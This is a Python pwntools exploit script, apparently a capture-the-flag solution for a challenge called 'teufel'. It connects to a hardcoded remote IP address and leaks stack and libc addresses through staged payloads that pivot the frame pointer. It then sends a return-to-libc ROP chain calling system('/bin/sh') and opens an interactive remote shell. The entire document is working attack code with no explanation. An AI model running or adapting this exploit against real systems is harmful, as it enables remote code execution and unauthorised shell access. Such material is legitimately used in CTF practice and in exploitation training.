teufel_exploit.py

from pwn import *


LIBCPATH = './libc.so.6'

e = elf.ELF(LIBCPATH)
system_offset = e.symbols['system'] - e.symbols['puts']
binsh_offset = next(e.search("/bin/sh")) - e.symbols['puts']

host = '136.243.194.41'
port = 666

func = 0x4004ea
func2 = 0x400532

conn = remote(host, port)

conn.send(p64(0x40))
conn.send("a"*9)

msg = conn.recv(4096)

leak = "\x00\x00"+msg[-2]+msg[-3]+msg[-4]+msg[-5]+msg[-6]+"\x00"
leak_int = int(enhex(leak), 16)

# STEP 0
print "[+] STEP 0"
new_ebp = leak_int - 512
conn.send(p64(0x40))
conn.send("aaaaaaaa"+p64(new_ebp)+p64(func))

conn.recv(1024)

# STEP 1
print "[+] STEP 1"
new_ebp2 = leak_int - 352
final_ebp = leak_int - 368
conn.send(p64(0x40))
conn.send("d"*8+p64(new_ebp2)+p64(func)+"D"*8+p64(final_ebp)+p64(func))

conn.recv(1024)

# STEP 2
print "[+] STEP 2"
new_ebp3 = leak_int - 488
conn.send(p64(0x40))
final_func = 0x4004e6
conn.send(p64(final_func)+p64(new_ebp3)+p64(func2))

conn.recv(1024)

# STEP 3
print "[+] STEP 3"

conn.send(p64(0x40))
conn.send("a"*8)

msg = conn.recv(1024)

leak_2 = "\x00\x00"+msg[-2]+msg[-3]+msg[-4]+msg[-5]+msg[-6]+msg[-7]
leak_2_int = int(enhex(leak_2), 16)

offset = 9210
puts_in_libc = leak_2_int + offset

system_in_libc = puts_in_libc + system_offset
binsh_in_libc = puts_in_libc + binsh_offset

gadget_offset = 0x218a2  # 0x22b1a

gadget_in_libc = puts_in_libc - e.symbols['puts'] + gadget_offset

conn.send(p64(0x40))
# ROP chain
conn.send("A"*16+p64(gadget_in_libc)+p64(binsh_in_libc)+p64(system_in_libc))

conn.recv(1024)

conn.interactive()